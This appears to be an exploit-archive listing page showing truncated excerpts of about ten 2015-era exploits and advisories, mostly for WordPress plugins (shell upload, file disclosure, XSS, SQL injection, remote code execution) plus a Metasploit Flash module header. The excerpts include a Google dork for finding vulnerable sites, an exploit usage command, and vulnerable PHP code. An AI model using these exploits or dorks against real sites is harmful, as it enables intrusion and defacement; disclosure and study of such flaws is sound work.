Tags archives: unix

 

0

WordPress InBoundio Marketing Shell Upload

<?php ########################################### #—————————————–# #[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]# #—————————————–# # *—————————-* # # K |….##…##..####…####….| . # # h |….#…#……..#..#…#…| A # # a |….#..#………#..#….#..| N # # l |….###……..##…#…..#.| S # # E |….#.#……….#..#….#..| e # # D |….#..#………#..#…#…| u # # . |….##..##…####…####….| r # # *—————————-* # [...]

 

0

WordPress MP3-Jplayer 2.1 Local File Disclosure

<?php ########################################### #—————————————–# #[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]# #—————————————–# # *—————————-* # # K |….##…##..####…####….| . # # h |….#…#……..#..#…#…| A # # a |….#..#………#..#….#..| N # # l |….###……..##…#…..#.| S # # E |….#.#……….#..#….#..| e # # D |….#..#………#..#…#…| u # # . |….##..##…####…####….| r # # *—————————-* # [...]

 

0

WordPress AB Google Map Travel CSRF / XSS

=============================================================================== CSRF/Stored XSS Vulnerability in AB Google Map Travel (AB-MAP) Wordpress Plugin ===============================================================================   . contents:: Table Of Content   Overview ========   * Title :Stored XSS Vulnerability in AB Google Map Travel (AB-MAP) Wordpress Plugin * Author: Kaustubh G. Padwad * Plugin Homepage: https://wordpress.org/plugins/ab-google-map-travel/ * Severity: HIGH * Version Affected: Version 3.4 and mostly [...]

 

0

WordPress Ajax Search Pro Remote Code Execution

—————————————————————————— WordPress ajax-search-pro Plugin Remote Code Execution ——————————————————————————   [-] Plugin Link:   http://codecanyon.net/item/ajax-search-pro-for-wordpress-live-search-plugin/3357410   also affected: https://wordpress.org/plugins/ajax-search-lite/ https://wordpress.org/plugins/related-posts-lite/   [-] Vulnerability Description:   This vulnerability allows any registered user to execute arbitrary functions vulnerability code:   add_action(‘wp_ajax_wpdreams-ajaxinput’, “wpdreams_ajaxinputcallback”); if (!function_exists(“wpdreams_ajaxinputcallback”)) { function wpdreams_ajaxinputcallback() { $param = $_POST; echo call_user_func($_POST['wpdreams_callback'], $param); exit; } }   [...]

 

0

WordPress Reflex Gallery 3.1.3 Shell Upload

<?php   /* # Exploit Title: Wordpress Plugin Reflex Gallery – Arbitrary File Upload # TIPE: Arbitrary File Upload # Google DORK: inurl:”wp-content/plugins/reflex-gallery/” # Vendor: https://wordpress.org/plugins/reflex-gallery/ # Tested on: Linux # Version: 3.1.3 (Last) # EXECUTE: php exploit.php www.alvo.com.br shell.php # OUTPUT: Exploit_AFU.txt # POC http://i.imgur.com/mpjXaZ9.png # REF COD http://1337day.com/exploit/23369   ——————————————————————————– <form method = [...]

 

0

Adobe Flash Player PCRE Regex Logic Error

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require ‘msf/core’   class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking   CLASSID = ‘d27cdb6e-ae6d-11cf-96b8-444553540000′   include Msf::Exploit::Powershell include Msf::Exploit::Remote::BrowserExploitServer   def initialize(info={}) super(update_info(info, ‘Name’ => “Adobe Flash Player PCRE Regex Vulnerability”, ‘Description’ => %q{ This module exploits a vulnerability found in Adobe [...]

 

0

DNS Spider Multithreaded Bruteforcer 0.6

#!/usr/bin/env python2 # -*- coding: latin-1 -*- ###################################################### # ____ _ __ # # ___ __ __/ / /__ ___ ______ ______(_) /___ __ # # / _ / // / / (_-</ -_) __/ // / __/ / __/ // / # # /_//_/_,_/_/_/___/__/__/_,_/_/ /_/__/_, / # # /___/ team # # # # [...]

 

0

WordPress Daily Edition Theme 1.6.2 Cross Site Scripting

*WordPress Daily Edition Theme v1.6.2 XSS (Cross-site Scripting) Security Vulnerabilities* Exploit Title: WordPress Daily Edition Theme /fiche-disque.php id Parameters XSS Security Vulnerabilities Product: WordPress Daily Edition Theme Vendor: WooThemes Vulnerable Versions: v1.6.* v1.5.* v1.4.* v1.3.* v1.2.* v1.1.* v.1.0.* Tested Version: v1.6.2 Advisory Publication: March 10, 2015 Latest Update: March 10, 2015 Vulnerability Type: Cross-Site Scripting [...]

 

0

WordPress Huge IT Slider 2.6.8 SQL Injection

Advisory ID: HTB23250 Product: Huge IT Slider WordPress Plugin Vendor: Huge-IT Vulnerable Version(s): 2.6.8 and probably prior Tested Version: 2.6.8 Advisory Publication: February 19, 2015 [without technical details] Vendor Notification: February 19, 2015 Vendor Patch: March 11, 2015 Public Disclosure: March 12, 2015 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2015-2062 Risk Level: Medium CVSSv2 [...]

 

0

WordPress Pie Register 2.0.14 Cross Site Scripting

[+]Title: Wordpress Pie Register Plugin 2.0.14 – XSS Vulnerability [+]Author: TUNISIAN CYBER [+]Date: 09/03/2015 [+]Type:WebApp [+]Risk:High [+]Affected Version:All [+]Overview: Pie Register 2.x suffers, from an XSS vulnerability.   [+]Proof Of Concept:   [PHP] global $piereg_dir_path; include_once( PIEREG_DIR_NAME.”/classes/invitation_code_pagination.php”);   if(isset($_POST['notice']) && $_POST['notice'] ){ echo ‘<div id=”message” class=”updated fade”><p><strong>’ . $_POST['notice'] . ‘.</strong></p></div>’; }elseif(isset($_POST['error']) && $_POST['error'] ){ [...]